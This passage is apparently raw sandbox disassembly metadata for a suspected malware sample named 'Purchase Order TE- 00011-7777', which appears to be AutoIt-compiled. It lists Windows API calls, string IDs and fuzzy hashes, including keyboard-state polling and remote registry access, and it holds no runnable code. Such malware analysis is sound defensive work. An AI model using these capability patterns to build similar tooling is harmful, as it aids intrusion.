                      • Instruction ID: dda19d6112b21521fc7f82f7aacf0bafb57a92d839e2f71a9cb652d75b911b17
                      • Opcode Fuzzy Hash: cce9194433887b59af17cb0d3f38847d2387a6ceefe71e6eb598898cf6360400
                      • Instruction Fuzzy Hash: D0517172900209BACF15EBA0DE42EEEB7F9EF14700F104566F106B21A1EE715F58DBA1
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00ADD37F
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00ADD3A0
                      • __swprintf.LIBCMT ref: 00ADD3F3
                      • _wprintf.LIBCMT ref: 00ADD499
                      • _wprintf.LIBCMT ref: 00ADD4B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2116804098-3420473620
                      • Opcode ID: 88823b357eb53fb2a3cf8fd448235266c4d4168cd597e7dd666aeda800950004
                      • Instruction ID: e10945958a5c033d93df6e23fe3460500822253ccd9abf0d78e6d167115b7650
                      • Opcode Fuzzy Hash: 88823b357eb53fb2a3cf8fd448235266c4d4168cd597e7dd666aeda800950004
                      • Instruction Fuzzy Hash: 4351A372900209AACF15EBA0DE42EEEB7B9EF14700F144466F106B21A1EB756F58DB61
                      APIs
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • _memset.LIBCMT ref: 00ACAF74
                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00ACAFA9
                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00ACAFC5
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00ACAFE1
                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00ACB00B
                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00ACB033
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB03E
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB043
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                      • API String ID: 1411258926-22481851
                      • Opcode ID: 6edc6b6595e2efcbf87267926ae55b9d48eef976d7e7de6187622d9a38460f06
                      • Instruction ID: 79b5bb438afeae8b7db167b757ccddfb2938232d928ef06d89bcf218343860c6
                      • Opcode Fuzzy Hash: 6edc6b6595e2efcbf87267926ae55b9d48eef976d7e7de6187622d9a38460f06
                      • Instruction Fuzzy Hash: 70410876D1022DAACF11EBA4DC95DEEB7B8BF18704F404069F901A3161EB719E04CFA1
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 3964851224-909552448
                      • Opcode ID: e259e6fed68bd2c8fc0da7993999878b04d40d764a134d9503a81ca696e2803b
                      • Instruction ID: 81a9eb2ce843a572122a4d8c78cc3da26f205848cc7d9217377255503f31d5a5
                      • Opcode Fuzzy Hash: e259e6fed68bd2c8fc0da7993999878b04d40d764a134d9503a81ca696e2803b
                      • Instruction Fuzzy Hash: B541913610024A8FCF08EF94D941BFA33A1BF2A390F1448A4FD515B295DB34DE2ADB60
                      APIs
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AD843F
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AD8455
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD8466
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AD8478
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AD8489
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: SendString$_memmove
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2279737902-1007645807
                      • Opcode ID: 1b01cc1d18cc2cf60b9ba21a78420f77542ea10fc7224357373353fabe50e525
                      • Instruction ID: cd764edfa8497d3390b3e14e0bd3d1915423e1e98cf1413887df6dc20da8900e
                      • Opcode Fuzzy Hash: 1b01cc1d18cc2cf60b9ba21a78420f77542ea10fc7224357373353fabe50e525
                      • Instruction Fuzzy Hash: 181194A1B5015979DB20A7A1DC4ADFF7BFCEF91F00F48046AB412A21D1DEA05F44C6B1
                      APIs
                      • timeGetTime.WINMM ref: 00AD809C
                        • Part of subcall function 00AAE3A5: timeGetTime.WINMM(?,75A8B400,00B06163), ref: 00AAE3A9
                      • Sleep.KERNEL32(0000000A), ref: 00AD80C8
                      • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00AD80EC
                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AD810E
                      • SetActiveWindow.USER32 ref: 00AD812D
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AD813B
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AD815A
                      • Sleep.KERNEL32(000000FA), ref: 00AD8165
                      • IsWindow.USER32 ref: 00AD8171
                      • EndDialog.USER32(00000000), ref: 00AD8182
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                      • Instruction ID: d186450afa2af3599369ab978ba659f2cd0e6d6af900476ff2265f6ad2a2e084
                      • Opcode Fuzzy Hash: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                      • Instruction Fuzzy Hash: E721A170200305BFE7225B22EC89B763BAAF718BCAB444256F50283361CF764E099611
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B03C64,00000010,00000000,Bad directive syntax error,00B2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00AD32D1
                      • LoadStringW.USER32(00000000,?,00B03C64,00000010), ref: 00AD32D8
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • _wprintf.LIBCMT ref: 00AD3309
                      • __swprintf.LIBCMT ref: 00AD332B
                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AD3395
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 1506413516-4153970271
                      • Opcode ID: 7244d62d1458276b329e6612e6c97411e55e9bd799db8e233b72b3f6c9acb563
                      • Instruction ID: 61a47173e078c4005113035a9d2fecb1c52345f8c2aa1b70a38a889bb8ea060f
                      • Opcode Fuzzy Hash: 7244d62d1458276b329e6612e6c97411e55e9bd799db8e233b72b3f6c9acb563
                      • Instruction Fuzzy Hash: A9215132940219BBCF11EF90CD0AFEE77B9BF14700F044456F516A60A2DA75AB54DB51
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 208665112-3771769585
                      • Opcode ID: 2371906cc6a17a89778b5011a80c105fe2f8ba1a9b6d986c4f2e06dde8436b75
                      • Instruction ID: ace51dd46e0381cf2b0c70c075fa069e7a63211f57119b308da9c39f2c102d8d
                      • Opcode Fuzzy Hash: 2371906cc6a17a89778b5011a80c105fe2f8ba1a9b6d986c4f2e06dde8436b75
                      • Instruction Fuzzy Hash: 3D112432A08125AFCB29AB709D5AEEE37BCDF00720F4040A6F05692191FF70DF8086A0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                      • String ID:
                      • API String ID: 3566271842-0
                      • Opcode ID: 00c1df3f632360ffdd6058902e5922031699ae25c47ea19603197c10bb62e7b0
                      • Instruction ID: a7c406b7cc63a7b8252ae11aaa4cd71e0daa145d3ad6685034346d49f663c653
                      • Opcode Fuzzy Hash: 00c1df3f632360ffdd6058902e5922031699ae25c47ea19603197c10bb62e7b0
                      • Instruction Fuzzy Hash: 3C711D75A00219AFDB10DFA5C984EDEB7B9FF48350F048495E919AB252DB74EE40CF90
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00AD3908
                      • SetKeyboardState.USER32(?), ref: 00AD3973
                      • GetAsyncKeyState.USER32(000000A0), ref: 00AD3993
                      • GetKeyState.USER32(000000A0), ref: 00AD39AA
                      • GetAsyncKeyState.USER32(000000A1), ref: 00AD39D9
                      • GetKeyState.USER32(000000A1), ref: 00AD39EA
                      • GetAsyncKeyState.USER32(00000011), ref: 00AD3A16
                      • GetKeyState.USER32(00000011), ref: 00AD3A24
                      • GetAsyncKeyState.USER32(00000012), ref: 00AD3A4D
                      • GetKeyState.USER32(00000012), ref: 00AD3A5B
                      • GetAsyncKeyState.USER32(0000005B), ref: 00AD3A84
                      • GetKeyState.USER32(0000005B), ref: 00AD3A92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                      • Instruction ID: 3c3fdd19e3ae88a012e303b87e51ce094378375a641af77879ef4fe13904e072
                      • Opcode Fuzzy Hash: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                      • Instruction Fuzzy Hash: 8051B562A0478429FF35EBA489117EEBBB45F01380F48859BD5C3562C2DAA49B8CC763
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 00ACFB19
                      • GetWindowRect.USER32(00000000,?), ref: 00ACFB2B
                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ACFB89
                      • GetDlgItem.USER32(?,00000002), ref: 00ACFB94
                      • GetWindowRect.USER32(00000000,?), ref: 00ACFBA6
                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ACFBFC
                      • GetDlgItem.USER32(?,000003E9), ref: 00ACFC0A
                      • GetWindowRect.USER32(00000000,?), ref: 00ACFC1B
                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ACFC5E
                      • GetDlgItem.USER32(?,000003EA), ref: 00ACFC6C
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ACFC89
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ACFC96
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                      • Instruction ID: 6fcf69bc7bd0e0dd8f97ca67333c733cd485e2b07de5f74ec0e9661f49b631ec
                      • Opcode Fuzzy Hash: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                      • Instruction Fuzzy Hash: 2851FE71B00209AFDB18CF69DD95FAEBBBAEB88710F55813DB919D7294DB709D008B10
                      APIs
                        • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AAB85B), ref: 00AAB926
                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00AAB9BD
                      • DestroyAcceleratorTable.USER32(00000000), ref: 00B0E775
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00B0E7A6
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00B0E7BD
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00B0E7D9
                      • DeleteObject.GDI32(00000000), ref: 00B0E7EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                      • Instruction ID: 975c35db9def75b381faea0bdf4cd17fcc6458f55315c7954b316980201fad28
                      • Opcode Fuzzy Hash: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                      • Instruction Fuzzy Hash: A8619A31110701CFDB369F29D988B26BBF5FB4A312F108999E196876B1CB75EC80CB60
                      APIs
                        • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                      • GetSysColor.USER32(0000000F), ref: 00AAB067
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                      • Instruction ID: a485e3a5f886ef23ec1acc4990d8f4fb4ead4cabeb5d046483aef30a7bf4c493
                      • Opcode Fuzzy Hash: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                      • Instruction Fuzzy Hash: 34418B31110540EFDB209F28D888BBA3BA6EB06721F5883A5FD759B1E6DB318C51DB31
                      Similarity
                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                      • String ID:
                      • API String ID: 136442275-0
                      • Opcode ID: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                      • Instruction ID: 89e1a5289ca5bc7aab68ea743458d9590e850fb7731a013be5e3c3410f16893f
                      • Opcode Fuzzy Hash: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                      • Instruction Fuzzy Hash: 6A41FCB290416CAADF25EB50CD55EDE73BCAB08310F5041E7F519A2152EB71ABD4CFA0
                      APIs
                      • __swprintf.LIBCMT ref: 00A984E5
                      • __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00AB2177: _xtow@16.LIBCMT ref: 00AB2198
                      Similarity
                      • API ID: __itow__swprintf_xtow@16
                      • String ID: %.15g$0x%p$False$True
                      • API String ID: 1502193981-2263619337
                      • Opcode ID: c9d01060394d01cd2f6b2f72cfe57f1d5a5838cb36eeabd9e2a6966ba12b3afb
                      • Instruction ID: 796bb3d382b71750a5c6ad137088d0aa093243d3aa54504798f98f4f54d8c555
                      • Opcode Fuzzy Hash: c9d01060394d01cd2f6b2f72cfe57f1d5a5838cb36eeabd9e2a6966ba12b3afb
                      • Instruction Fuzzy Hash: 6C41DF71600605ABDF34DB38DD82FAA7BE9EF45310F2044AAE54AD7292EA35DA41CB10
                      APIs
                      • _memset.LIBCMT ref: 00AB5CCA
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • __gmtime64_s.LIBCMT ref: 00AB5D63
                      • __gmtime64_s.LIBCMT ref: 00AB5D99
                      • __gmtime64_s.LIBCMT ref: 00AB5DB6
                      • __allrem.LIBCMT ref: 00AB5E0C
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E28
                      • __allrem.LIBCMT ref: 00AB5E3F
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E5D
                      • __allrem.LIBCMT ref: 00AB5E74
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E92
                      • __invoke_watson.LIBCMT ref: 00AB5F03
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                      • String ID:
                      • API String ID: 384356119-0
                      • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                      • Instruction ID: a1602f9cdbcb11fd03974639339bb939078e6aa04981ff8923c7137fb6a0a753
                      • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                      • Instruction Fuzzy Hash: A071E872E01B16ABE714EF79CD81BEA77BDAF11364F144229F510D7682E770DA408B90
                      APIs
                      • _memset.LIBCMT ref: 00AD5816
                      • GetMenuItemInfoW.USER32(00B518F0,000000FF,00000000,00000030), ref: 00AD5877
                      • SetMenuItemInfoW.USER32(00B518F0,00000004,00000000,00000030), ref: 00AD58AD
                      • Sleep.KERNEL32(000001F4), ref: 00AD58BF
                      • GetMenuItemCount.USER32(?), ref: 00AD5903
                      • GetMenuItemID.USER32(?,00000000), ref: 00AD591F
                      • GetMenuItemID.USER32(?,-00000001), ref: 00AD5949
                      • GetMenuItemID.USER32(?,?), ref: 00AD598E
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AD59D4
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD59E8
                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5A09
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                      • String ID:
                      • API String ID: 4176008265-0
                      • Opcode ID: a8d6c71cbd8b37aa77e8dc8183050aa81876593f2aa6f94da96f0d3e3d18ddd6
                      • Instruction ID: 33a8e1c4d150121a17755e4e17e5527ed78cb17477df499fa212698cdce5c19f
                      • Opcode Fuzzy Hash: a8d6c71cbd8b37aa77e8dc8183050aa81876593f2aa6f94da96f0d3e3d18ddd6
                      • Instruction Fuzzy Hash: 9A61AC70D00659EFDB11CFB8C998EAE7BB9EB01358F18455AE442A7351DB30AD01DB20
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF9AA5
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF9AA8
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AF9ACC
                      • _memset.LIBCMT ref: 00AF9ADD
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9AEF
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF9B67
                      Similarity
                      • API ID: MessageSend$LongWindow_memset
                      • String ID:
                      • API String ID: 830647256-0
                      • Opcode ID: 892920e34cf7c5dbe76546c2863798152a61ff8bdc16f7a7175b5e8828b48b9c
                      • Instruction ID: 53484656457c26fc191d5c04df2eeb9a2ca965cc0abfc53b7b88b6ab0703f50b
                      • Opcode Fuzzy Hash: 892920e34cf7c5dbe76546c2863798152a61ff8bdc16f7a7175b5e8828b48b9c
                      • Instruction Fuzzy Hash: CB614975A00208AFDB21DFA8CD81FEE77F8AB09710F104599FA15E72A2D770AD46DB50
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00AD3591
                      • GetAsyncKeyState.USER32(000000A0), ref: 00AD3612
                      • GetKeyState.USER32(000000A0), ref: 00AD362D
                      • GetAsyncKeyState.USER32(000000A1), ref: 00AD3647
                      • GetKeyState.USER32(000000A1), ref: 00AD365C
                      • GetAsyncKeyState.USER32(00000011), ref: 00AD3674
                      • GetKeyState.USER32(00000011), ref: 00AD3686
                      • GetAsyncKeyState.USER32(00000012), ref: 00AD369E
                      • GetKeyState.USER32(00000012), ref: 00AD36B0
                      • GetAsyncKeyState.USER32(0000005B), ref: 00AD36C8
                      • GetKeyState.USER32(0000005B), ref: 00AD36DA
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
